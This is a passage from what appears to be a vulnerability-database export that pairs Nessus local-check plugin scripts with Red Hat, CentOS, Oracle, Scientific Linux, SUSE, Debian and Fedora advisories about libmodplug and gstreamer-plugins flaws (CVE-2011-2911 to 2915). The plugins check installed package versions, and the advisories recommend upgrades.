exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = 
os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"libmodplug-0.8.8.4-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:46:15", "description": "From Red Hat Security Advisory 2011:1264 :\n\nUpdated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. 
(CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : gstreamer-plugins (ELSA-2011-1264)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:gstreamer-plugins-devel", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:gstreamer-plugins"], "id": "ORACLELINUX_ELSA-2011-1264.NASL", "href": "https://www.tenable.com/plugins/nessus/68345", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:1264 and \n# Oracle Linux Security Advisory ELSA-2011-1264 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68345);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"RHSA\", value:\"2011:1264\");\n\n script_name(english:\"Oracle Linux 4 : gstreamer-plugins (ELSA-2011-1264)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:1264 :\n\nUpdated gstreamer-plugins 
packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-September/002347.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gstreamer-plugins packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gstreamer-plugins\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gstreamer-plugins-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"gstreamer-plugins-0.8.5-1.0.1.EL.4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"gstreamer-plugins-devel-0.8.5-1.0.1.EL.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer-plugins / gstreamer-plugins-devel\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:46:02", "description": "The gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. 
(CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.", "edition": 24, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : gstreamer-plugins on SL4.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20110906_GSTREAMER_PLUGINS_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61131", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61131);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2911\");\n\n script_name(english:\"Scientific Linux Security Update : gstreamer-plugins on SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. 
An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1109&L=scientific-linux-errata&T=0&P=1260\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f7838f47\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected gstreamer-plugins, gstreamer-plugins-debuginfo and\n/ or gstreamer-plugins-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"gstreamer-plugins-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"gstreamer-plugins-debuginfo-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"gstreamer-plugins-devel-0.8.5-1.EL.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:27:16", "description": "Updated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.", "edition": 25, "published": "2011-09-09T00:00:00", "title": "CentOS 4 : gstreamer-plugins (CESA-2011:1264)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-09-09T00:00:00", "cpe": ["cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:gstreamer-plugins", "p-cpe:/a:centos:centos:gstreamer-plugins-devel"], "id": "CENTOS_RHSA-2011-1264.NASL", "href": "https://www.tenable.com/plugins/nessus/56126", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1264 and \n# CentOS Errata and Security Advisory 2011:1264 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56126);\n script_version(\"1.10\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"RHSA\", value:\"2011:1264\");\n\n script_name(english:\"CentOS 4 : gstreamer-plugins (CESA-2011:1264)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. 
(CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-September/017719.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?da8aed77\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-September/017720.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?50d39208\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gstreamer-plugins packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gstreamer-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gstreamer-plugins-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"gstreamer-plugins-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"gstreamer-plugins-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"gstreamer-plugins-devel-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"gstreamer-plugins-devel-0.8.5-1.EL.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer-plugins / gstreamer-plugins-devel\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": 
[{"lastseen": "2016-09-04T11:29:41", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "This update of libmodplug0 fixes the following issues:\n\n 1) An integer overflow error exists within the\n \"CSoundFile::ReadWav()\" function (src/load_wav.cpp) when\n processing certain WAV files. This can be exploited to\n cause a heap-based buffer overflow by tricking a user into\n opening a specially crafted WAV file. (CVE-2011-2911)\n\n 2) Boundary errors within the \"CSoundFile::ReadS3M()\"\n function (src/load_s3m.cpp) when processing S3M files can\n be exploited to cause stack-based buffer overflows by\n tricking a user into opening a specially crafted S3M file.\n (CVE-2011-2912)\n\n\n 3) An off-by-one error within the \"CSoundFile::ReadAMS()\"\n function (src/load_ams.cpp) can be exploited to cause a\n stack corruption by tricking a user into opening a\n specially crafted AMS file. (CVE-2011-2913)\n\n 4) An off-by-one error within the \"CSoundFile::ReadDSM()\"\n function (src/load_dms.cpp) can be exploited to cause a\n memory corruption by tricking a user into opening a\n specially crafted DSM file. (CVE-2011-2914)\n\n 5) An off-by-one error within the \"CSoundFile::ReadAMS2()\"\n function (src/load_ams.cpp) can be exploited to cause a\n memory corruption by tricking a user into opening a\n specially crafted AMS file. 
(CVE-2011-2915)\n\n Also an overflow in the ABC loader was fixed.\n (CVE-2011-1761)\n\n", "edition": 1, "modified": "2011-08-24T21:08:24", "published": "2011-08-24T21:08:24", "id": "OPENSUSE-SU-2011:0943-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html", "title": "libmodplug: Fixed multiple vulnerabilities reported in <= 0.8.8.3 (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:20:14", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2415-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nFebruary 21, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libmodplug\nVulnerability : several\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2011-1761 CVE-2011-2911 CVE-2011-2912 CVE-2011-2913\n CVE-2011-2914 CVE-2011-2915\n\nSeveral vulnerabilities that can lead to the execution of arbitrary code\nhave been discovered in libmodplug, a library for mod music based on\nModPlug. The Common Vulnerabilities and Exposures project identifies\nthe following issues:\n\nCVE-2011-1761\n\n epiphant discovered that the abc file parser is vulnerable to several\n stack-based buffer overflows that potentially lead to the execution\n of arbitrary code.\n\nCVE-2011-2911\n\n Hossein Lotfi of Secunia discovered that the CSoundFile::ReadWav\n function is vulnerable to an integer overflow which leads to a\n heap-based buffer overflow. 
An attacker can exploit this flaw to\n potentially execute arbitrary code by tricking a victim into opening\n crafted WAV files.\n\nCVE-2011-2912\n\n Hossein Lotfi of Secunia discovered that the CSoundFile::ReadS3M\n function is vulnerable to a stack-based buffer overflow. An attacker\n can exploit this flaw to potentially execute arbitrary code by\n tricking a victim into opening crafted S3M files.\n\nCVE-2011-2913\n\n Hossein Lotfi of Secunia discovered that the CSoundFile::ReadAMS\n function suffers from an off-by-one vulnerability that leads to \n memory corruption. An attacker can exploit this flaw to potentially\n execute arbitrary code by tricking a victim into opening crafted AMS\n files.\n\nCVE-2011-2914\n\n It was discovered that the CSoundFile::ReadDSM function suffers\n from an off-by-one vulnerability that leads to memory corruption.\n An attacker can exploit this flaw to potentially execute arbitrary\n code by tricking a victim into opening crafted DSM files.\n\nCVE-2011-2915\n\n It was discovered that the CSoundFile::ReadAMS2 function suffers\n from an off-by-one vulnerability that leads to memory corruption.\n An attacker can exploit this flaw to potentially execute arbitrary\n code by tricking a victim into opening crafted AMS files.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:0.8.8.1-1+squeeze2.\n\nFor the testing (wheezy) and unstable (sid) distributions, this problem\nhas been fixed in version 1:0.8.8.4-1.\n\nWe recommend that you upgrade your libmodplug packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2012-02-22T00:06:11", "published": "2012-02-22T00:06:11", "id": "DEBIAN:DSA-2415-1:6A5A5", "href": 
"https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00042.html", "title": "[SECURITY] [DSA 2415-1] libmodplug security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:18:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2226-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 26, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libmodplug\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-1574 \nDebian Bug : 622091\n\nM. Lucinskij and P. Tumenas discovered a buffer overflow in the code for\nprocessing S3M tracker files in the Modplug tracker music library, which \nmay result in the execution of arbitrary code.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 0.8.4-1+lenny2.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:0.8.8.1-1+squeeze1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:0.8.8.2-1.\n\nWe recommend that you upgrade your libmodplug packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2011-04-26T21:21:08", "published": "2011-04-26T21:21:08", "id": "DEBIAN:DSA-2226-1:EB2E2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00095.html", "title": "[SECURITY] [DSA 2226-1] libmodplug security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": 
[{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2911", "CVE-2011-2912", "CVE-2011-2913", "CVE-2011-2915"], "description": "Modplug mod music file format library. ", "modified": "2011-08-22T15:25:03", "published": "2011-08-22T15:25:03", "id": "FEDORA:7589D28259", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: libmodplug-0.8.8.4-1.fc16", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574", "CVE-2011-1761", "CVE-2011-2911", "CVE-2011-2912", "CVE-2011-2913", "CVE-2011-2915"], "description": "Modplug mod music file format library. ", "modified": "2011-08-17T00:58:10", "published": "2011-08-17T00:58:10", "id": "FEDORA:2D39D110B4E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: libmodplug-0.8.8.4-1.fc14", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1761", "CVE-2011-2911", "CVE-2011-2912", "CVE-2011-2913", "CVE-2011-2915"], "description": "Modplug mod music file format library. ", "modified": "2011-08-17T01:20:40", "published": "2011-08-17T01:20:40", "id": "FEDORA:92B48110E1C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: libmodplug-0.8.8.4-1.fc15", "cvss": {"score": 6.8, "vector": 